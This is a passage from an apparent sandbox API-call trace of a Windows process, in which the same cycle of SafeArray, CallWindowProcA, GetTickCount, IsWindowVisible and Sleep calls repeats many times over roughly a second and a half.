(lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116148b [0196.296] GetTickCount () returned 0x36c0b [0196.296] GetLastError () returned 0x578 [0196.296] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.297] GetCurrentProcessId () returned 0xa38 [0196.297] CoFreeUnusedLibraries () [0196.297] GetTickCount () returned 0x36c0b [0196.297] GetTickCount () returned 0x36c0b [0196.297] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.297] Sleep (dwMilliseconds=0x0) [0196.343] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.344] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.344] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11614b9 [0196.344] GetTickCount () returned 0x36c39 [0196.344] GetLastError () returned 0x578 [0196.344] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.344] GetCurrentProcessId () returned 0xa38 [0196.344] CoFreeUnusedLibraries () [0196.344] GetTickCount () returned 0x36c39 [0196.344] GetTickCount () returned 0x36c39 [0196.344] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.344] Sleep (dwMilliseconds=0x0) [0196.389] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.390] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.390] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.390] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11614e8 [0196.390] GetTickCount () returned 0x36c68 [0196.390] GetLastError () returned 0x578 [0196.390] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.390] GetCurrentProcessId () returned 0xa38 [0196.390] CoFreeUnusedLibraries () [0196.390] GetTickCount () returned 0x36c68 [0196.390] GetTickCount () returned 0x36c68 [0196.390] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.390] Sleep (dwMilliseconds=0x0) [0196.437] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.438] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.438] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.438] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161517 [0196.438] GetTickCount () returned 0x36c97 [0196.438] GetLastError () returned 0x578 [0196.438] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.438] GetCurrentProcessId () returned 0xa38 [0196.438] CoFreeUnusedLibraries () [0196.438] GetTickCount () returned 0x36c97 [0196.438] GetTickCount () returned 0x36c97 [0196.438] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.439] Sleep (dwMilliseconds=0x0) [0196.486] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.487] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.487] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.487] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161546 [0196.487] GetTickCount () returned 0x36cc6 [0196.487] GetLastError () returned 0x578 [0196.487] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.487] GetCurrentProcessId () returned 0xa38 [0196.487] CoFreeUnusedLibraries () [0196.487] GetTickCount () returned 0x36cc6 [0196.487] GetTickCount () returned 0x36cc6 [0196.487] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.487] Sleep (dwMilliseconds=0x0) [0196.530] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.530] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.531] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.531] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161575 [0196.531] GetTickCount () returned 0x36cf5 [0196.531] GetLastError () returned 0x578 [0196.531] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.531] GetCurrentProcessId () returned 0xa38 [0196.531] CoFreeUnusedLibraries () [0196.531] GetTickCount () returned 0x36cf5 [0196.531] GetTickCount () returned 0x36cf5 [0196.531] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.531] Sleep (dwMilliseconds=0x0) [0196.577] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.577] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.577] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.577] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11615a3 [0196.577] GetTickCount () returned 0x36d23 [0196.577] GetLastError () returned 0x578 [0196.578] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.578] GetCurrentProcessId () returned 0xa38 [0196.578] CoFreeUnusedLibraries () [0196.578] GetTickCount () returned 0x36d23 [0196.578] GetTickCount () returned 0x36d23 [0196.578] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.578] Sleep (dwMilliseconds=0x0) [0196.639] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.639] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.640] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.640] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11615e2 [0196.640] GetTickCount () returned 0x36d62 [0196.640] GetLastError () returned 0x578 [0196.640] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.640] GetCurrentProcessId () returned 0xa38 [0196.640] CoFreeUnusedLibraries () [0196.640] GetTickCount () returned 0x36d62 [0196.640] GetTickCount () returned 0x36d62 [0196.640] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.640] Sleep (dwMilliseconds=0x0) [0196.702] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.702] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.702] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.702] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161620 [0196.702] GetTickCount () returned 0x36da0 [0196.702] GetLastError () returned 0x578 [0196.703] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.703] GetCurrentProcessId () returned 0xa38 [0196.703] CoFreeUnusedLibraries () [0196.703] GetTickCount () returned 0x36da0 [0196.703] GetTickCount () returned 0x36da0 [0196.703] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.703] Sleep (dwMilliseconds=0x0) [0196.779] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.780] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.780] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.780] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116166e [0196.780] GetTickCount () returned 0x36dee [0196.780] GetLastError () returned 0x578 [0196.780] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.780] GetCurrentProcessId () returned 0xa38 [0196.780] CoFreeUnusedLibraries () [0196.780] GetTickCount () returned 0x36dee [0196.780] GetTickCount () returned 0x36dee [0196.780] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.781] Sleep (dwMilliseconds=0x0) [0196.826] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.827] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.827] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.827] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116169d [0196.827] GetTickCount () returned 0x36e1d [0196.827] GetLastError () returned 0x578 [0196.827] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.827] GetCurrentProcessId () returned 0xa38 [0196.828] CoFreeUnusedLibraries () [0196.828] GetTickCount () returned 0x36e1d [0196.828] GetTickCount () returned 0x36e1d [0196.828] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.828] Sleep (dwMilliseconds=0x0) [0196.873] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.873] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.873] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.873] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11616cc [0196.873] GetTickCount () returned 0x36e4c [0196.873] GetLastError () returned 0x578 [0196.873] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.874] GetCurrentProcessId () returned 0xa38 [0196.874] CoFreeUnusedLibraries () [0196.874] GetTickCount () returned 0x36e4c [0196.874] GetTickCount () returned 0x36e4c [0196.874] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.874] Sleep (dwMilliseconds=0x0) [0196.920] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.920] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.920] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.920] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11616fb [0196.920] GetTickCount () returned 0x36e7b [0196.920] GetLastError () returned 0x578 [0196.920] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.921] GetCurrentProcessId () returned 0xa38 [0196.921] CoFreeUnusedLibraries () [0196.921] GetTickCount () returned 0x36e7b [0196.921] GetTickCount () returned 0x36e7b [0196.921] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.921] Sleep (dwMilliseconds=0x0) [0196.966] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.967] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.967] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.967] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161729 [0196.967] GetTickCount () returned 0x36ea9 [0196.967] GetLastError () returned 0x578 [0196.967] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.967] GetCurrentProcessId () returned 0xa38 [0196.967] CoFreeUnusedLibraries () [0196.967] GetTickCount () returned 0x36ea9 [0196.967] GetTickCount () returned 0x36ea9 [0196.968] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.968] Sleep (dwMilliseconds=0x0) [0197.013] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.014] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.014] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.014] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161758 [0197.014] GetTickCount () returned 0x36ed8 [0197.014] GetLastError () returned 0x578 [0197.014] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.014] GetCurrentProcessId () returned 0xa38 [0197.014] CoFreeUnusedLibraries () [0197.014] GetTickCount () returned 0x36ed8 [0197.014] GetTickCount () returned 0x36ed8 [0197.014] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.014] Sleep (dwMilliseconds=0x0) [0197.076] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.076] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.077] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.077] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161797 [0197.077] GetTickCount () returned 0x36f17 [0197.077] GetLastError () returned 0x578 [0197.077] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.077] GetCurrentProcessId () returned 0xa38 [0197.077] CoFreeUnusedLibraries () [0197.077] GetTickCount () returned 0x36f17 [0197.077] GetTickCount () returned 0x36f17 [0197.077] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.077] Sleep (dwMilliseconds=0x0) [0197.122] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.123] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.123] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.123] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11617c5 [0197.123] GetTickCount () returned 0x36f45 [0197.123] GetLastError () returned 0x578 [0197.123] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.123] GetCurrentProcessId () returned 0xa38 [0197.123] CoFreeUnusedLibraries () [0197.123] GetTickCount () returned 0x36f45 [0197.123] GetTickCount () returned 0x36f45 [0197.123] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.123] Sleep (dwMilliseconds=0x0) [0197.169] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.170] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.170] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.170] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11617f4 [0197.170] GetTickCount () returned 0x36f74 [0197.170] GetLastError () returned 0x578 [0197.170] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.170] GetCurrentProcessId () returned 0xa38 [0197.170] CoFreeUnusedLibraries () [0197.170] GetTickCount () returned 0x36f74 [0197.170] GetTickCount () returned 0x36f74 [0197.171] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.171] Sleep (dwMilliseconds=0x0) [0197.216] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.217] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.217] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.217] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161823 [0197.217] GetTickCount () returned 0x36fa3 [0197.217] GetLastError () returned 0x578 [0197.217] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.217] GetCurrentProcessId () returned 0xa38 [0197.217] CoFreeUnusedLibraries () [0197.217] GetTickCount () returned 0x36fa3 [0197.217] GetTickCount () returned 0x36fa3 [0197.217] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.217] Sleep (dwMilliseconds=0x0) [0197.263] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.264] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.264] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.264] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161852 [0197.264] GetTickCount () returned 0x36fd2 [0197.264] GetLastError () returned 0x578 [0197.264] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.264] GetCurrentProcessId () returned 0xa38 [0197.265] CoFreeUnusedLibraries () [0197.265] GetTickCount () returned 0x36fd2 [0197.265] GetTickCount () returned 0x36fd2 [0197.265] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.265] Sleep (dwMilliseconds=0x0) [0197.310] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.311] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.311] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.311] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161881 [0197.311] GetTickCount () returned 0x37001 [0197.311] GetLastError () returned 0x578 [0197.311] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.311] GetCurrentProcessId () returned 0xa38 [0197.311] CoFreeUnusedLibraries () [0197.311] GetTickCount () returned 0x37001 [0197.312] GetTickCount () returned 0x37001 [0197.312] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.312] Sleep (dwMilliseconds=0x0) [0197.358] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.359] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.359] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161890 [0197.359] GetTickCount () returned 0x37010 [0197.359] GetLastError () returned 0x578 [0197.359] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.359] GetCurrentProcessId () returned 0xa38 [0197.359] CoFreeUnusedLibraries () [0197.359] GetTickCount () returned 0x37010 [0197.359] GetTickCount () returned 0x37010 [0197.360] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.360] Sleep (dwMilliseconds=0x0) [0197.403] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.404] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.404] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.404] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11618bf [0197.404] GetTickCount () returned 0x3703f [0197.404] GetLastError () returned 0x578 [0197.404] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.404] GetCurrentProcessId () returned 0xa38 [0197.405] CoFreeUnusedLibraries () [0197.405] GetTickCount () returned 0x3703f [0197.405] GetTickCount () returned 0x3703f [0197.405] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.405] Sleep (dwMilliseconds=0x0) [0197.450] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.450] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.451] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.451] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11618ee [0197.451] GetTickCount () returned 0x3706e [0197.451] GetLastError () returned 0x578 [0197.451] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.451] GetCurrentProcessId () returned 0xa38 [0197.451] CoFreeUnusedLibraries () [0197.451] GetTickCount () returned 0x3706e [0197.451] GetTickCount () returned 0x3706e [0197.451] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.451] Sleep (dwMilliseconds=0x0) [0197.497] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.497] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.497] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.497] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116191d [0197.497] GetTickCount () returned 0x3709d [0197.498] GetLastError () returned 0x578 [0197.498] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.498] GetCurrentProcessId () returned 0xa38 [0197.498] CoFreeUnusedLibraries () [0197.498] GetTickCount () returned 0x3709d [0197.498] GetTickCount () returned 0x3709d [0197.498] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.498] Sleep (dwMilliseconds=0x0) [0197.544] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.544] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.544] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.544] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116194b [0197.545] GetTickCount () returned 0x370cb [0197.545] GetLastError () returned 0x578 [0197.545] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.545] GetCurrentProcessId () returned 0xa38 [0197.545] CoFreeUnusedLibraries () [0197.545] GetTickCount () returned 0x370cb [0197.545] GetTickCount () returned 0x370cb [0197.545] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.545] Sleep (dwMilliseconds=0x0) [0197.590] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.591] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.591] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.591] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116197a [0197.591] GetTickCount () returned 0x370fa [0197.591] GetLastError () returned 0x578 [0197.591] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.591] GetCurrentProcessId () returned 0xa38 [0197.591] CoFreeUnusedLibraries () [0197.591] GetTickCount () returned 0x370fa [0197.591] GetTickCount () returned 0x370fa [0197.592] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.592] Sleep (dwMilliseconds=0x0) [0197.624] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.624] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.624] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.624] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161999 [0197.625] GetTickCount () returned 0x37119 [0197.625] GetLastError () returned 0x578 [0197.625] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.625] GetCurrentProcessId () returned 0xa38 [0197.625] CoFreeUnusedLibraries () [0197.625] GetTickCount () returned 0x37119 [0197.625] GetTickCount () returned 0x37119 [0197.625] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.625] Sleep (dwMilliseconds=0x0) [0197.669] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.669] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.670] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.670] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11619c8 [0197.670] GetTickCount () returned 0x37148 [0197.670] GetLastError () returned 0x578 [0197.670] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.670] GetCurrentProcessId () returned 0xa38 [0197.670] CoFreeUnusedLibraries () [0197.670] GetTickCount () returned 0x37148 [0197.670] GetTickCount () returned 0x37148 [0197.670] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.670] Sleep (dwMilliseconds=0x0) [0197.716] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.716] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.716] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.716] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11619f7 [0197.716] GetTickCount () returned 0x37177 [0197.716] GetLastError () returned 0x578 [0197.716] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.716] GetCurrentProcessId () returned 0xa38 [0197.717] CoFreeUnusedLibraries () [0197.717] GetTickCount () returned 0x37177 [0197.717] GetTickCount () returned 0x37177 [0197.717] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.717] Sleep (dwMilliseconds=0x0) [0197.762] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.763] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.763] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.763] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161a26 [0197.763] GetTickCount () returned 0x371a6 [0197.763] GetLastError () returned 0x578 [0197.763] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.763] GetCurrentProcessId () returned 0xa38 [0197.763] CoFreeUnusedLibraries () 